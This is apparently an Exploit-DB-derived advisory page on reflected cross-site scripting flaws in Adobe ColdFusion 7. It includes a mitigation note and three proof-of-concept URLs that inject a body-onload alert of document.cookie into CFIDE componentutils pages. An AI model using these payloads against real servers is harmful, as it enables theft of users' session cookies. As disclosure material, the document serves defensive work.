header-logo
Suggest Exploit
vendor:
ColdFusion
by:
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: ColdFusion
Affected Version From: Adobe ColdFusion 7
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:adobe:coldfusion
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in Adobe ColdFusion

The vulnerabilities allow attackers to execute arbitrary script code in the context of the affected website, potentially leading to the theft of cookie-based authentication credentials and other attacks.

Mitigation:

Ensure that user-supplied data is properly sanitized and validated before being used in the application. Implement input validation and output encoding to prevent XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49787/info

Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Adobe ColdFusion 7 is vulnerable; other versions may also be affected. 

http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E